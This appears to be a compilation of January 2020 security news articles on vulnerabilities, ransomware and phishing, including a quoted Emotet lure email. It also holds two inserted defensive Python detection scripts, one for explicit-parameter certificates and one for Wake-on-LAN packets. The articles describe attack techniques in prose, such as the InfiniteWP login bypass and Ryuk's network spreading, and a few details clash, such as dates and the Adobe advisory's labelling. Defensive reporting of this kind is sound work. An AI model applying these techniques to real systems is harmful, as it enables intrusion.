"A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates," says Microsoft's security advisory. "An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider," Microsoft adds.

After successfully exploiting unpatched systems, attackers can launch man-in-the-middle attacks, as well as decrypt confidential info from user connections to the impacted software.

"By exploiting this vulnerability, an attacker may be able to spoof a valid X.509 certificate chain on a vulnerable Windows system," CERT/CC vulnerability analyst Will Dormann explains.

"This may allow various actions including, but not limited to, interception and modification of TLS-encrypted communications or spoofing an Authenticode signature."

Will Dormann (@wdormann), Jan 14, 2020:
"Now that it's all public:
1) CVE-2020-0601 - Windows doesn't properly validate X.509 certificate chains. https://www.kb.cert.org/vuls/id/849224/
2) CVE-2020-0609, CVE-2020-0610 - Windows Remote Desktop Gateway (not to be confused with RDP proper) unauthenticated RCE. https://www.kb.cert.org/vuls/id/491944/"
Microsoft's security update addresses the vulnerability tracked as CVE-2020-0601 and reported by the NSA by making sure that the Windows CryptoAPI completely validates ECC certificates.

"This vulnerability is classed Important and we have not seen it used in active attacks," Microsoft Security Response Center' Principal Security Program Manager Mechele Gruhn added.

"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk."

Microsoft encourages security researchers and organizations to report other potential vulnerabilities using the company's MSRC Researcher Portal.

Mitigation, prevention, and detection options
The NSA security advisory also provides mitigation measures for systems where immediately installing the patches Microsoft released as part of its January 2020 Patch Tuesday is not possible.

"Network devices and endpoint logging features may prevent or detect some methods of exploitation," says the agency's advisory.

"Properly configured and managed TLS inspection proxies independently validate TLS certificates from external entities and will reject invalid or untrusted certificates, protecting endpoints from certificates that attempt to exploit the vulnerabilities.

Ensure that certificate validation is enabled for TLS proxies to limit exposure to this class of vulnerabilities and review logs for signs of exploitation."

The NSA also recommends using capture analysis tools like Wireshark and tools such as OpenSSL and the Windows certutil utility to extract and analyze certificates to detect any malicious properties.

Certutil can be used to examine an X.509 certificate by running the following command:
certutil -asn

OpenSSL can be used to examine an X.509 certificate by running one of the following commands:
openssl asn1parse -inform DER -in -i -dump
openssl x509 -inform DER -in -text

Certutil can be used to list registered elliptic curves and view their parameters by running the following commands:
certutil -displayEccCurve
certutil -displayEccCurve

OpenSSL can be used to view the standard curves enabled/compiled into OpenSSL by running the following commands:
openssl ecparam -list_curves
openssl ecparam -name -param_enc explicit -text
"Certificates with named elliptic curves, manifested by explicit curve OID values, can be ruled benign," the NSA explains.

However, "certificates containing explicitly-defined elliptic curve parameters which only partially match a standard curve are suspicious, especially if they include the public key for a trusted certificate, and may represent bona fide exploitation attempts."
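The distinction the NSA draws above (a named-curve OID can be ruled benign, explicitly-defined parameters deserve a closer look) can be automated when reviewing certificates in bulk. The Python below is an added example, not code from the NSA advisory, CERT/CC or Microsoft: it walks DER-encoded X.509 data, finds the id-ecPublicKey AlgorithmIdentifier and reports whether its parameters are a namedCurve OID, an explicit ECParameters SEQUENCE, or implicitlyCA. The sample inputs are constructed SubjectPublicKeyInfo blobs with placeholder key and curve values (only the P-256 field prime is real), and the function and table names are my own.

```python
"""Classify the EC key parameters in DER-encoded X.509 data: namedCurve OID vs
explicitly-defined ECParameters (the pattern the NSA advisory flags as suspicious)."""
from typing import Iterator, Optional, Tuple

ID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"
NAMED_CURVES = {"1.2.840.10045.3.1.7": "prime256v1 / P-256",
                "1.3.132.0.34": "secp384r1 / P-384", "1.3.132.0.35": "secp521r1 / P-521"}


def read_tlv(data: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Decode one DER tag-length-value at pos; return (tag, value, position after it)."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def decode_oid(value: bytes) -> str:
    first = value[0]
    arcs = [2, first - 80] if first >= 80 else [first // 40, first % 40]
    acc = 0
    for b in value[1:]:                                # base-128 arcs, high bit = continue
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def walk_der(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield every (tag, value) in a DER blob, descending into constructed types."""
    pos = 0
    while pos < len(data):
        tag, value, pos = read_tlv(data, pos)
        yield tag, value
        if tag & 0x20:                                 # SEQUENCE, SET, [n] EXPLICIT
            yield from walk_der(value)


def classify_ec_parameters(der: bytes) -> Optional[Tuple[str, str]]:
    """Locate the id-ecPublicKey AlgorithmIdentifier (in a whole certificate or a bare
    SubjectPublicKeyInfo) and classify its parameters; None if there is no EC key."""
    for tag, value in walk_der(der):
        if tag != 0x30 or len(value) < 2:
            continue
        t1, v1, nxt = read_tlv(value, 0)
        if t1 != 0x06 or decode_oid(v1) != ID_EC_PUBLIC_KEY or nxt >= len(value):
            continue
        t2, v2, _ = read_tlv(value, nxt)
        if t2 == 0x06:                                 # namedCurve OID: benign per NSA
            return ("named", NAMED_CURVES.get(decode_oid(v2), decode_oid(v2)))
        if t2 == 0x30:                                 # explicit ECParameters: review
            return ("explicit", "explicitly-defined ECParameters")
        return ("implicit" if t2 == 0x05 else "unknown", f"parameters tag 0x{t2:02x}")
    return None


def is_suspicious(der: bytes) -> bool:
    """True when the EC key carries explicit parameters and warrants manual review."""
    result = classify_ec_parameters(der)
    return result is not None and result[0] == "explicit"


# --- constructed sample input (tiny DER encoder; these are not real certificates) ---
def der_tlv(tag: int, value: bytes) -> bytes:
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def der_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    body = bytes([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(reversed(chunk))
    return der_tlv(0x06, body)


P256_PRIME = bytes.fromhex("FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF")
PUBKEY = der_tlv(0x03, b"\x00\x04" + bytes(64))        # placeholder point, not a real key
NAMED_CURVE_SPKI = der_tlv(0x30, der_tlv(0x30, der_oid(ID_EC_PUBLIC_KEY) + der_oid("1.2.840.10045.3.1.7")) + PUBKEY)
EXPLICIT_PARAMS = der_tlv(0x30,
    der_tlv(0x02, b"\x01")                                                          # version
    + der_tlv(0x30, der_oid("1.2.840.10045.1.1") + der_tlv(0x02, b"\x00" + P256_PRIME))  # prime-field p
    + der_tlv(0x30, der_tlv(0x04, b"\x00") + der_tlv(0x04, b"\x00"))                # a, b (placeholders)
    + der_tlv(0x04, b"\x04" + bytes(64))                                            # base point G (placeholder)
    + der_tlv(0x02, b"\x01") + der_tlv(0x02, b"\x01"))                              # order, cofactor (placeholders)
EXPLICIT_PARAMS_SPKI = der_tlv(0x30, der_tlv(0x30, der_oid(ID_EC_PUBLIC_KEY) + EXPLICIT_PARAMS) + PUBKEY)

if __name__ == "__main__":
    for name, blob in (("named", NAMED_CURVE_SPKI), ("explicit", EXPLICIT_PARAMS_SPKI)):
        print(name, classify_ec_parameters(blob), "REVIEW" if is_suspicious(blob) else "ok")
```

Feed it the bytes of a DER certificate (for example one converted with openssl x509 -inform PEM -outform DER) and treat an "explicit" result as a candidate for the manual comparison against standard curves that the advisory describes; the classifier only identifies the encoding form, it does not decide whether the explicit parameters match or partially match a known curve.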


Critical WordPress Plugin Bug Allows Admin Logins Without Password
20.1.2020 
Bleepingcomputer  Vulnerebility

A critical authentication bypass vulnerability allows anyone to log in as an administrator user on WordPress sites running an affected version of the InfiniteWP Client because of logical mistakes in the code.

Based on the active installations tracked by the WordPress plugin library, the open-source InfiniteWP plugin is currently installed on over 300,000 websites, while the plugin's site claims that it's installed on over 513,000 sites.

Upon installation, InfiniteWP Client is designed to allow its users to manage an unlimited number of WordPress sites from a central location with "one-click updates for WordPress, plugins, and themes across all your sites."

Critical authentication bypass flaw
The vulnerability was patched by Revmakx, the plugin's maker, on January 8 with the release of InfiniteWP Client 1.9.4.5, one day after researchers at web app security outfit WebARX disclosed the vulnerability on January 7.

Since the InfiniteWP Client version including the security fix was released, a little over 167,000 users have already updated their installation, with around 130K left to patch to secure their websites from potential future attacks.

"In order for the request to even get to the vulnerable part of the code, we first must encode the payload with JSON, then Base64, then send it raw to the site in a POST request," WebARX says.

"All we need to know is the username of an administrator on the site. After the request has been sent, you will automatically be logged in as the user."

The issue was found in the iwp_mmb_set_request function in the init.php file, a function designed to check whether actions attempted by a user are authenticated.

However, the researchers found that the readd_site and add_site actions have no authorization check, a flaw that can be exploited with the correct payload to have the InfiniteWP server automatically log the requester in as an admin.

InfiniteWP (Image: WebARX)
"Once the payload meets these conditions, the username parameter that is supplied will be used to login the requester as that user without performing any further authentication," WebARX adds.

Admins who are still using InfiniteWP client version 1.9.4.4 or earlier are advised to update their installations as soon as possible to prevent having their websites compromised.

Another authentication bypass, caused by improper authentication logic and allowing users to log in as admins, was found in the WordPress plugin WP Time Capsule.

The WP Time Capsule plugin is also developed by Revmakx and is active on more than 20,000 websites. The flaw was also patched by the developer on January 8, with almost all users (~19,180) having already patched their installations since.


Adobe Releases Their January 2020 Security Updates
20.1.2020 
Bleepingcomputer  Vulnerebility

Adobe has released its monthly security updates that fix vulnerabilities in Adobe Experience Manager and Adobe Illustrator CC. All users are advised to install the applicable updates as soon as possible to resolve these vulnerabilities.

This is the first security update from Adobe in 2020 and surprisingly does not contain any fixes for Adobe Flash Manager, which is typically in the top spot when it comes to the number of vulnerabilities fixed.

There are, though, four vulnerabilities in Adobe Experience Manager and five in Adobe Illustrator CC, with the vulnerabilities in Illustrator being more critical as they can lead to arbitrary code execution.

Below are the Adobe December 2019 security updates:
APSB20-01 Security update available for Adobe Experience Manager
This update fixes four vulnerabilities in the Adobe Experience Manager.

Of the four vulnerabilities fixed by this update, three are classified as 'Important' and one as 'Moderate'. These vulnerabilities allow an attacker to view information on the computer that they would normally not have access to.

Vulnerability Category | Vulnerability Impact | Severity | CVE Number | Affected Versions | Download Package
Reflected Cross-Site Scripting | Sensitive Information Disclosure | Important | CVE-2019-16466 | AEM 6.3, AEM 6.4, AEM 6.5 | Cumulative Fix Pack 6.3.3.7, Service Pack 6.4.7.0, Service Pack 6.5.3.0
Reflected Cross-Site Scripting | Sensitive Information Disclosure | Important | CVE-2019-16467 | AEM 6.3, AEM 6.4, AEM 6.5 | Cumulative Fix Pack 6.3.3.7, Service Pack 6.4.7.0, Service Pack 6.5.3.0
User Interface Injection | Sensitive Information Disclosure | Moderate | CVE-2019-16468 | AEM 6.3, AEM 6.4, AEM 6.5 | Cumulative Fix Pack 6.3.3.7, Service Pack 6.4.7.0, Service Pack 6.5.3.0
Expression Language Injection | Sensitive Information Disclosure | Important | CVE-2019-16469 | AEM 6.5 | Service Pack 6.5.3.0
Users should download the latest version of Acrobat and Reader to resolve these vulnerabilities.

APSB20-03 Security update available for Adobe Illustrator CC
This security update resolves five 'Critical' vulnerabilities in Adobe Illustrator that could lead to remote code execution. This would allow attackers to use these vulnerabilities in the software to execute almost any command they wish on the computer.

Vulnerability Category | Vulnerability Impact | Severity | CVE Numbers
Memory Corruption | Arbitrary Code Execution | Critical | CVE-2020-3710, CVE-2020-3711, CVE-2020-3712, CVE-2020-3713, CVE-2020-3714

Users are advised to upgrade to Adobe Illustrator CC 24.0.2 to resolve these vulnerabilities.


United Nations Targeted With Emotet Malware Phishing Attack
20.1.2020 
Bleepingcomputer  Phishing  Virus

Pretending to be the Permanent Mission of Norway, the Emotet operators performed a targeted phishing attack against email addresses associated with users at the United Nations.

Yesterday, the Emotet trojan roared back to life after a 3-week vacation with strong spam campaigns that targeted countries throughout the world.

While Emotet's normal spam campaigns pretended to be fake accounting reports, delivery notices, and invoices, the malware operators had something special in mind for the United Nations.

Impersonating the "Permanent Mission of Norway"
In a sample of a phishing email shared with BleepingComputer by email security firm Cofense, the Emotet operators pretend to be representatives of Norway at the United Nations in New York, who state that there is a problem with an attached signed agreement.

According to Cofense, this phishing campaign had "highly specific targeting" and was seen being sent to 600 unique email addresses at the United Nations.

The email states that the representatives of Norway found a problem with a signed agreement and that the recipient should review it to learn the issue.

Emotet spam targeting the United Nations
The full text of this targeted phishing email can be read below:

Hi,

Please be advised that the new problem has been appeared today.
See below our info for this question.

Please let me know if you need anything else.

Regards

Permanent Mission of Norway to the United Nations in New York
Attached to these emails is a Microsoft Word document that starts with "Doc_01_13" that pretends to be the signed agreement being sent by the Permanent Mission of Norway.

While there was room for Emotet to send a more convincing Word document template, they instead sent the same one that is used for all of the malspam campaigns.

This template pretends to be a warning that the "document only available for desktop or laptop versions of Microsoft Office Word." It then prompts the user to click on 'Enable editing' or 'Enable Content' to view the document.

Malicious Email Attachment
If a user opens the document and enables its content, malicious Word macros will be executed that download and install Emotet on the computer.

Emotet will now run in the background while sending out spam emails to other victims.

Eventually, Emotet will also install other payloads such as Trickbot, which would be when things get really bad for the compromised UN workstation.

Emotet can lead to a full network compromise
When Emotet is installed on a machine, one of the malware payloads that is invariably installed is the TrickBot trojan.

The TrickBot trojan will attempt to harvest data from the computer such as cookies, login credentials, files from the computer, and possibly spread to other computers on the network.

After the harvesting of information is finished, TrickBot is known to open a reverse shell back to the operators of Ryuk Ransomware.

These operators will proceed to infiltrate the network, gain administrator credentials, and ultimately deploy Ryuk so that it encrypts every device on the network.

This is particularly worrisome for a UN network as ransomware operators are known to steal data before encrypting files, which could expose extremely sensitive diplomatic or government information.

While there are no known victims of this phishing attack, this targeted attack illustrates that bad actors are constantly trying to get access to the networks of organizations and government networks.

This is why it is imperative for all employees regardless of what sector they work in to be properly trained on how to recognize phishing emails.

Furthermore, before opening any attachments and enabling macros, users should notify their network administrator and contact the alleged user who sent the email to confirm its authenticity.

BleepingComputer has contacted the Permanent Mission of Norway about this attack but has not heard back at this time.


Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices
20.1.2020 
Bleepingcomputer  Ransomware

The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them.

Wake-on-Lan is a hardware feature that allows a powered down device to be woken up, or powered on, by sending a special network packet to it. This is useful for administrators who may need to push out updates to a computer or perform scheduled tasks when it is powered down.

According to a recent analysis of the Ryuk Ransomware by Head of SentinelLabs Vitali Kremez, when the malware is executed it will spawn subprocesses with the argument '8 LAN'.

Spawning subprocess with 8 LAN argument
When this argument is used, Ryuk will scan the device's ARP table, which is a list of known IP addresses on the network and their associated MAC addresses, and check whether the entries are part of the private IP address subnets "10.", "172.16.", and "192.168."

Checking for private network
If the ARP entry is part of any of those networks, Ryuk will send a Wake-on-Lan (WoL) packet to the device's MAC address to have it power up. This WoL request comes in the form of a 'magic packet' containing 'FF FF FF FF FF FF FF FF'.

Ryuk sending a WoL packet
If the WoL request was successful, Ryuk will then attempt to mount the remote device's C$ administrative share.

Mount drive to the Remote C$ Share
If they can mount the share, Ryuk will encrypt that remote computer's drive as well.

In conversations with BleepingComputer, Kremez stated that this evolution in Ryuk's tactics allows better reach in a compromised network from a single device and shows the Ryuk operators' skill at traversing a corporate network.

"This is how the group adapted the network-wide ransomware model to affect more machines via the single infection and by reaching the machines via WOL & ARP," Kremez told BleepingComputer. "It allows for more reach and less isolation and demonstrates their experience dealing with large corporate environments."

To mitigate this new feature, administrators should only allow Wake-on-Lan packets from administrative devices and workstations.

This would allow administrators to still benefit from this feature while adding some security to the endpoints.

At the same time, this does not help if an administrative workstation is compromised, which happens quite often in targeted ransomware attacks.

Update 1/14/20 11:28 AM: CrowdStrike also has analysis of this feature here.
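As an added example (not from Kremez's analysis, CrowdStrike's, or any vendor tool), the following Python shows one way to act on the mitigation above on the detection side: parse UDP payloads for the standard Wake-on-LAN magic packet layout (six 0xFF bytes followed by the target MAC repeated sixteen times) and alert on any that originate from a host outside an allowlist of administrative sources. The flows, the allowlist and the MAC address are constructed sample data. It also includes the string-prefix subnet test as the article describes Ryuk's check, which is narrower than the full RFC 1918 172.16.0.0/12 range.

```python
"""Spot Wake-on-LAN magic packets in captured UDP payloads and flag those that do
not come from an approved administrative host (the mitigation the article recommends)."""
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Standard WoL magic packet layout: six 0xFF synchronisation bytes, then the target
# MAC repeated 16 times; an optional 4- or 6-byte SecureOn password may follow.
# Magic packets are usually carried in UDP to port 9 (or 7) or as EtherType 0x0842 frames.
SYNC = b"\xff" * 6


def parse_magic_packet(payload: bytes) -> Optional[str]:
    """Return the target MAC (aa:bb:cc:dd:ee:ff) if payload is a magic packet, else None."""
    if len(payload) < len(SYNC) + 16 * 6 or payload[:6] != SYNC:
        return None
    mac = payload[6:12]
    if payload[6:102] != mac * 16:                 # every one of the 16 copies must match
        return None
    return ":".join(f"{b:02x}" for b in mac)


def is_ryuk_checked_prefix(ip: str) -> bool:
    """The subnet test as the article describes it: a string-prefix match on '10.',
    '172.16.' and '192.168.'. This is narrower than RFC 1918: 172.17.0.0 through
    172.31.255.255 would not match, so hosts there would not receive a WoL packet."""
    return ip.startswith(("10.", "172.16.", "192.168."))


def review_wol_traffic(flows: Iterable[Tuple[str, bytes]],
                       admin_sources: Set[str]) -> List[Dict[str, str]]:
    """flows are (source_ip, udp_payload) pairs, e.g. from a capture filtered on UDP/9.
    Returns one alert per magic packet whose source is not an approved admin host."""
    alerts: List[Dict[str, str]] = []
    for src, payload in flows:
        mac = parse_magic_packet(payload)
        if mac is None or src in admin_sources:    # not WoL, or an expected management host
            continue
        alerts.append({"src": src, "target_mac": mac,
                       "reason": "WoL magic packet from non-administrative host"})
    return alerts


# --- constructed sample data (not a real capture) ---
ADMIN_WOL_SOURCES = {"192.168.1.10"}               # hypothetical management workstation
TARGET_MAC = bytes.fromhex("001122334455")         # constructed MAC, no real device
SAMPLE_MAGIC = SYNC + TARGET_MAC * 16
SAMPLE_FLOWS = [
    ("192.168.1.10", SAMPLE_MAGIC),                # admin host waking a machine: expected
    ("10.0.0.23", SAMPLE_MAGIC),                   # ordinary workstation sending WoL: alert
    ("10.0.0.40", b"not a magic packet"),          # unrelated UDP traffic: ignored
    ("10.0.0.41", SYNC + TARGET_MAC * 15 + bytes(6)),  # malformed repeat block: not WoL
]

if __name__ == "__main__":
    for alert in review_wol_traffic(SAMPLE_FLOWS, ADMIN_WOL_SOURCES):
        print(alert)
```

The allowlist approach mirrors the article's advice to accept Wake-on-LAN only from administrative devices; as the text also notes, it cannot help once one of those administrative hosts is itself compromised, so an alert from an allowed source still deserves correlation with other activity such as unexpected C$ mounts.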


Windows 7 Reaches End of Life Tomorrow, What You Need to Know
20.1.2020 
Bleepingcomputer  OS

It's the end of an era: Windows 7 will reach end of support tomorrow, January 14, a decade after its initial release, and Microsoft will no longer provide users with software updates, security updates, or fixes.

"The specific end of support day for Windows 7 will be January 14, 2020," Microsoft says. "After that, technical assistance and software updates from Windows Update that help protect your PC will no longer be available for the product.

Therefore, it's important that you upgrade to a modern operating system such as Windows 10, which can provide the latest security updates to help keep you and your data safer."

For products that have reached their end of support, Microsoft stops providing bug fixes for issues that are discovered, security fixes for newly found vulnerabilities, or technical support.

Customers who still use end of service software are advised by Redmond to move to a new Windows 10 device or to upgrade as soon as possible to avoid falling victim to malware infections and attacks exploiting newly discovered security risks.

Security updates after the end of support
However, as Microsoft says on its support website, "for customers requiring more time to move to the latest product, the Extended Security Update (ESU) program is available for certain legacy products as a last resort option.

The ESU program provides security updates only for up to 3 years, after the End of Support date. Contact your account manager, partner or device manufacturer for more information."

The Extended Security Updates program is available for Windows 7 Professional, Windows 7 Enterprise, and Windows 7 Ultimate through volume licensing programs, and it does not include or provide customers with user-requested non-security updates, new features, or design change requests.

"If an organization waits and purchases ESU for the first time in year two or year three, they will have to pay for the preceding years also," Microsoft adds. "This is because the security updates that are offered under the ESU program are cumulative."

Windows IT Pro (@MSWindowsITPro), Dec 10, 2019:
"Windows 7 will reach end of support on January 14, 2020. If you have questions about obtaining, deploying, or managing Windows 7 Extended Security Updates (ESU) for your org, make sure to join our #AMA next Tuesday (12/17)!! http://aka.ms/ama/Windows7ESU pic.twitter.com/LDmd8wU6vC"
Besides the ESU program, Redmond also provides the Windows Virtual Desktop program, enabling orgs to continue using Windows 7 with free extended security updates through January 2023.

After Windows 7's end of support, the 0Patch platform will also continue to ship patches to its agents for vulnerabilities rated as high-risk.

"Each Patch Tuesday we'll review Microsoft's security advisories to determine which of the vulnerabilities they have fixed for supported Windows versions might apply to Windows 7 or Windows Server 2008 and present a high-enough risk to warrant micropatching," 0Patch said.

End of support reminders and free Windows 10 upgrades
Microsoft will start displaying full-screen notifications on Windows 7 devices on January 15 to remind users that their operating system is no longer supported and that they should upgrade to the latest Windows 10 version.

Windows 7 Professional customers who have enrolled in the Extended Security Updates program, use domain-joined machines, or machines in kiosk mode will not be shown this reminder.

While Microsoft says that upgrading to Windows 10 from Windows 7 for free was only available until July 29, 2016, free Windows 10 upgrades are still a thing.

You can do so using this step by step Windows 10 upgrade procedure that involves running the Media Creation Tool and choosing the 'Upgrade this PC now' option on your Windows 7 computer.

Windows 7 end of support notification
Chrome and Edge to support Windows 7 after EoL
Google announced that they will keep supporting Google Chrome in Windows 7 through July 15, 2021 (at least), to give companies more time to upgrade to Windows 10.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10,"Google said. "We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021.

So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

This means that Google Chrome users will still receive browser security updates after Windows 7 end of support, with management tools and enterprise policies to continue to work.

Today, Microsoft also said that they will continue to support their new Microsoft Edge web browser in Windows 7 for as long as Google does.

Other Microsoft products reaching EoL in 2020
Windows 7 is not the only Microsoft product reaching end of support this year, with several other major Microsoft products including Office 2010, Visual Studio 2010, Windows Server 2008 (including 2008R2), and multiple Windows 10 versions also being retired.

A list of some of the most prominent ones and links to more details for each of them is available below.

Product | End of Support date
SQL Server 2008 and 2008 R2 | 07/09/19
Windows Server 2008 and 2008 R2 | 01/14/20
Exchange Server 2010 |
Office 2010 client | 10/13/20
SharePoint Server 2010 |
Project Server 2010 |
Windows 7 currently has a market share of over 26% according to StatCounter and NetMarketShare, with Windows 10 being installed on more than 65% of Windows devices.

Windows 7 market share (NetMarketShare)
In related news, the KDE Community said last week that it wants Windows 7 users to migrate to the Plasma desktop environment after Microsoft's 10-year-old OS reaches end of support.

The KDE Community says it wants to help Windows 7 refugees migrate to one of the 25 Linux distributions with Plasma support.

"Instead of migrating to Windows 10 and putting up with hours of updates, intrusions on your privacy and annoying ads built into your apps, install a Linux operating system with Plasma," KDE said.

"In 30 minutes you will be up and running and you will have all the security and stability of a Linux system, with all the features and ease of use of Plasma."

Out of Windows' current 77% market share, more than 26% are Windows 7 users amounting to almost one billion people that can't let go of the decade-old OS because they either are scared of the change or don't like Windows 10.


Microsoft to Support the New Edge Browser After Windows 7 EOL
20.1.2020 
Bleepingcomputer  OS

Microsoft will continue to support the new Microsoft Edge in Windows 7 even after the operating system reaches the end of life tomorrow.

With tomorrow being the last day that Windows 7 will receive any security and operating system updates from Microsoft, it was not 100% clear if Microsoft would also continue to support Microsoft Edge in the operating system.

Google announced last week that they will continue to support Google Chrome in Windows 7 through at least July 15th, 2021 to give organizations time to upgrade to Windows 10.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10. We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021. So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

According to a report by Neowin, Microsoft has told them that they will continue to support the new Microsoft Edge in Windows 7 for as long as Google does.

This is because the new Microsoft Edge is a Chromium-based browser, which is the same engine used by Google Chrome. If one works on Windows 7, for the most part, the other will as well.

This is a smart move by both companies as there is no technical reason that either of these browsers should not be able to run in all Windows versions from Windows 7 through Windows 10.

Unless there is a core change in the Windows operating system, I also do not see this changing soon.

With that said, Windows 7 users should upgrade to Windows 10 as soon as possible to keep their operating system secure.

Without security updates, users are at risk from new vulnerabilities that will not be patched and could lead to malware infections, such as ransomware, or the full compromise of a vulnerable computer.

If your hardware supports Windows 10, I strongly suggest you take advantage of Microsoft's free upgrade offer while it is still available.

Update 1/13/20: Microsoft issued us the following vague statement regarding how long they would support Microsoft Edge:

"We’re going to continue to support Windows 7 users with the new Microsoft Edge."


CISA Releases Test Tool for Citrix ADC CVE-2019-19781 Vulnerability
20.1.2020 
Bleepingcomputer  Vulnerebility

DHS CISA released a public domain tool designed to help security staff to test if their organizations are vulnerable to ongoing attacks that might target the CVE-2019-19781 security flaw impacting the Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) products.

"The Cybersecurity and Infrastructure Security Agency (CISA) has released a utility that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability," says the DHS agency.

CISA also strongly recommends that all organizations review CERT/CC's VU#619785 vulnerability note and the Citrix CTX267027 security bulletin and apply the described mitigation measures until new versions of the software are released.

According to the CTX267027 bulletin, Citrix will be releasing new Citrix ADC and Citrix Gateway versions to patch the CVE-2019-19781 vulnerability starting January 20, 2020.

US-CERT

@USCERT_gov
Is your Citrix ADC and Gateway software susceptible to CVE-2019-19781? Visit CISA to find out how to test it. https://go.usa.gov/xdqGV #Cyber #Cybersecurity #InfoSec

9:03 PM - Jan 13, 2020
Attackers are probing, exploits already available
The vulnerability makes it possible for unauthenticated attackers to perform arbitrary code execution via directory traversal if successfully exploited.

Several working proof-of-concept (PoC) exploits for the CVE-2019-19781 vulnerability are already publicly available (we won't be linking to them for obvious reasons) from numerous locations.

The PoC exploits allow attackers to create reverse shells back to their machines and execute malicious commands on the compromised devices, effectively enabling the attacker to gain full control over the machines.

Two days earlier, we reported on ongoing scans for vulnerable Citrix hosts following warnings from security researchers, coupled with the additional warning that an exploit is imminent and that admins must apply mitigation measures as soon as possible.

Fermin J. Serna
@fjserna
We just published further information around the Citrix ADC/Gateway vulnerability with fix release dates. If I can recommend something, apply the mitigation ASAP if you have the management IP exposed and not firewall protected. It stops the attack on known vulnerable scenarios. https://twitter.com/CitrixNetwork/status/1216153467926073349 …

Citrix Networking
@CitrixNetwork
Blog post from @Citrix CISO @fjserna about updates to the Citrix ADC, Citrix Gateway #CVE201919781 vulnerability - https://bit.ly/36LRITI

1:43 AM - Jan 12, 2020
A technical deep dive for this vulnerability was published by security outfit MDSec, providing a demo of how a working PoC can be used.

TrustedSec also provides a guide that can be followed to check your devices for evidence of a compromise, with Citrix ADC admins being advised to monitor their devices for attacks.

Additionally, Nextron Systems's Florian Roth provided Sigma detection rules for SIEM systems for detecting CVE-2019-19781 exploit attempts on Citrix ADC (NetScaler) and Citrix Gateway devices.

Finally, a list of the estimated dates on which patches for the Citrix Application Delivery Controller (ADC) and Citrix Gateway CVE-2019-19781 vulnerability will be published is available below.

Version   Refresh Build   Expected Release Date
10.5      10.5.70.x       31st January 2020
11.1      11.1.63.x       20th January 2020
12.0      12.0.63.x       20th January 2020
12.1      12.1.55.x       27th January 2020
13.0      13.0.47.x       27th January 2020


BEC Scammers Use Aging Report Phishing to Find New Targets
20.1.2020 
Bleepingcomputer  Phishing  Spam

A group tracked as Ancient Tortoise is targeting accounts receivable specialists, tricking them into sending over aging reports and thus collecting info on customers they can scam in later attack stages.

Aging reports (aka schedule of accounts receivable) are collections of outstanding invoices designed to help a company's financial department to keep track of customers who haven't yet paid for goods or services they bought on credit.

These sets of invoices allow accounting staff and management to get an overview of the company's credit and collection processes by breaking down the outstanding debts into increments going from thirty to more than ninety days overdue.

Going beyond BEC scams
While BEC aka EAC (short for Email Account Compromise) scammers are known for using social engineering or hacking to switch the bank accounts used by an organization's financial department to wire out funds, the Ancient Tortoise actors go beyond that.

A report shared exclusively with BleepingComputer that will go live tomorrow shows how researchers at Agari Cyber Intelligence Division (ACID) observed the new threat group impersonating a company's CFO and requesting an updated aging report together with up-to-date contact information for each of the customers that had unpaid overdue invoices.

Not asking the company's employees to change payment accounts is a tactic used by Ancient Tortoise to gain their trust and trick them into following up on their demands for company records.

The attackers also made use of name deception and free email accounts designed to mimic the firm's CFO to further strengthen their hoax.

Aging report phishing attack (Agari)
However, Agari's research team was the one who connected with them, continuing the email exchange to further understand the inner workings of Ancient Tortoise's fraud scheme.

According to Crane Hassold, senior director of threat research at Agari, the research team "happily obliged and sent them a fake aging report containing the names of purported customers, the amounts of overdue payments, and the names and contact details for each of the 'customers' accounts payable points of contact."

The threat actors collected all the fake customer data delivered by Agari's researchers and, two days after the email exchange, they started contacting all the fake customers, "requesting payment for the outstanding invoices referenced in the aging report" and asking for the outstanding invoices to be paid via ACH or wire to a new account.

To make their email look legitimate, Ancient Tortoise registered a new domain about an hour and a half before sending the messages that closely mimicked our fake employee’s domain. Of course, the display name and username used by the scammer also matched our persona as well. - Agari

Given that the attackers now had all the info they needed to create emails that would perfectly match a supplier's messages, the damage following a real-world attack, in which Ancient Tortoise would hold legitimate customer information, could prove severe for some of their victims.

This also allows the group to launch attacks that are a lot more convincing (the phishing emails contain info like order numbers, debt amounts, and company details) than a run-of-the-mill BEC attack, where the threat actors have to rely on their social engineering skills to deceive their targets.

